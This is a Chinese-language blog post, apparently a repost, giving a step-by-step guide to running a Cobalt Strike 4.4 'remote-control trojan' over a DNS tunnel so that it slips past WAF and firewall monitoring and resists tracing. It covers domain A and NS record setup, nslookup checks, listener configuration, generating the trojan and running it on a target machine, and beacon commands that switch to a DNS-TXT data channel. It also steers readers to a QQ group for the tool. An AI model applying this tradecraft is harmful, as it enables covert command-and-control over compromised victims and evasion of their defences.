輕鬆繞過waf,內網技術,Cobalt Strike4.4遠控木馬繞waf流量監控
DNS隧道技術可以解決運控木馬無法上線的問題,waf,防火牆對tcp,http,https等埠有流量檢測,這個時候我們就可以使用隧道技術,讓cs木馬走DNS隧道,不僅可以檢測不到而且也是一種反溯源的方法。
cs使用DNS反溯源—推薦部落格—》反溯源
我這個只是講如何通過CDN上線cs運控木馬,不是我不想跟上面的師傅(反溯源)一樣,而是在註冊免費國外域名的時候出現了freenom網站不讓新使用者註冊,所以使用不了,這個我到時候再出一篇部落格來解決這個問題。
需要:
雲伺服器
域名
域名解析
在你自己的伺服器上面開啟UDP的53埠
一.DNS配置問題
首先你需要一個域名(freenom網站可以免費註冊,但是最近不知道為什麼註冊不了),我的是阿里雲的。
DNS解析在你購買的域名的網站配置
A記錄->cs主機記錄->CS伺服器IP
NS記錄->ns1主機記錄->上個A記錄地址(cs.域名(如:cs.baidu.com))
NS記錄->ns2主機記錄->上個A記錄地址(cs.域名(如:cs.baidu.com))
這裡的ns2和ns1主機名是A的主機記錄+域名:cs.域名(如:cs.baidu.com)
驗證dns解析是否成功
開啟命令列輸入:
C:\Users\Lenovo>nslookup cs.t****n.cool
伺服器: UnKnown
Address: fe80::1
非權威應答:
名稱: cs.t***n.cool
Address: 42.***.***.184
C:\Users\Lenovo>nslookup ns1.t***n.cool
伺服器: UnKnown
Address: fe80::1
非權威應答:
名稱: ns1.t***n.cool
Address: 0.0.0.0
C:\Users\Lenovo>nslookup ns2.t****.cool
DNS request timed out.
timeout was 2 seconds.
伺服器: UnKnown
Address: fe80::1
非權威應答:
名稱: ns2.t***n.cool
Address: 0.0.0.0
配置錯誤的師傅請加入qq群:184324009
二.cs配置
我的cs是4.4版本的,需要工具的師傅請加入qq群聊:184324009
關於cs的配置我會出一篇cs配置教學
點選進入監聽模式
點選新增
設定為
dns地址為NS記錄如:ns1.xxxx.com
dns地址(Stager):為解析A記錄 cs.xxx.com
DNS解析伺服器為:你cs伺服器ip
接下來生成運控木馬,要選擇下面這個,上面的接收不到
然後發目標機裡面執行,坐等上線,上線時間與伺服器解析網路掛鉤
上線後,會得到一個黑框框,這個時候輸入一些命令就可以了
beacon> checkin
[] Tasked beacon to checkin
beacon> mode dns-txt
[+] data channel set to DNS-TXT
[+] host called home, sent: 8 bytes
就可以正常
歡迎各位師傅加入qq群討論,(群主有時間會直播解答疑問)
qq群:184324009
轉載於up主自己的部落格:https://www.taoyuan.cool/post-10.html